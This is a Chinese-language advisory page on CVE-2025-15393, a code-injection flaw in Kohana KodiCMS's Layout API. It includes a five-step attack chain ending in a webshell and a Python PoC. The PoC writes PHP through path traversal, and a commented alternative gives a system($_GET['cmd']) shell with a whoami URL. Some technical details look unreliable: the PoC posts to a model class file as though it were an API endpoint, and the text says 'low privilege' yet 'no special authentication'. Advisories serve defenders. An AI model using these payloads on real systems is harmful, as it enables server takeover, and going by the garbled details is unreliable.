CVE-2025-15393 CVSS 6.3 中危

CVE-2025-15393 Kohana KodiCMS Layout API 代码注入漏洞

披露日期: 2025-12-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15393

漏洞类型

代码注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kohana KodiCMS

漏洞概述

CVE-2025-15393是影响Kohana KodiCMS的一款中危代码注入漏洞，CVSS评分6.3。该漏洞存在于Layout API端点的Save函数中，攻击者可以通过操纵content参数注入恶意代码。由于该漏洞可远程利用且无需用户交互，低权限攻击者即可实施攻击，存在被恶意利用的风险。KodiCMS是一个基于Kohana框架开发的内容管理系统，广泛用于网站构建。漏洞已于2025年12月31日公开披露，厂商在收到安全通知后未作出任何回应，用户需自行采取防护措施。

技术细节

该漏洞位于cms/modules/kodicms/classes/kodicms/model/file.php文件的Save函数中。漏洞根源在于对用户提交的content参数缺乏充分的输入过滤和验证，攻击者可以在content参数中注入PHP代码或其他可执行命令。当Save函数处理该参数时，未经过滤的恶意代码会被写入文件或被解释执行。攻击者利用Layout API端点（/cms/modules/kodicms/classes/kodicms/model/file.php）可直接发起攻击。CVSS向量显示攻击复杂度低（AC:L），权限要求为低权限（PR:L），攻击者无需特殊认证即可利用。成功利用后可导致机密性、完整性和可用性均受到低级别影响。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用的Kohana KodiCMS版本，确认版本号≤13.82.135

STEP 2

步骤2

攻击者访问Layout API端点cms/modules/kodicms/classes/kodicms/model/file.php

STEP 3

步骤3

构造包含恶意PHP代码的content参数，通过Save函数注入代码

STEP 4

步骤4

利用路径遍历或直接写入将恶意文件保存到Web可访问目录

STEP 5

步骤5

访问生成的Webshell，执行任意命令获取服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15393 PoC - Kohana KodiCMS Code Injection
# Target: Kohana KodiCMS up to version 13.82.135
# Endpoint: Layout API (cms/modules/kodicms/classes/kodicms/model/file.php)
# Attack Type: Code Injection via content parameter

target_url = "http://target.com/cms/modules/kodicms/classes/kodicms/model/file.php"

# Malicious payload - PHP code injection
payload = {
    "action": "save",
    "content": "<?php phpinfo(); ?>",  # Inject PHP code
    "file_path": "../../../../../shell.php"  # Path traversal to write shell
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Payload sent successfully")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative RCE payload:
# payload = {"action": "save", "content": "<?php system($_GET['cmd']); ?>"}
# Access shell: http://target.com/shell.php?cmd=whoami

影响范围

Kohana KodiCMS <= 13.82.135

防御指南

临时缓解措施

由于厂商未回应且暂无官方修复版本，建议立即采取以下临时措施：1) 临时禁用Layout API端点或限制其访问；2) 在Web服务器层面配置规则拦截包含PHP代码标签的请求；3) 加强用户权限管理，确保低权限用户无法访问敏感API；4) 部署入侵检测系统监控可疑请求；5) 考虑迁移到其他CMS解决方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15393
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15393
3 Details https://www.cvedetails.com/cve/CVE-2025-15393/
4 VulDB https://vuldb.com/cve/CVE-2025-15393
5 Link https://vuldb.com/?ctiid.339162
6 Link https://vuldb.com/?id.339162
7 Link https://vuldb.com/?submit.718290
8 Link https://vuldb.com/?submit.718290

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表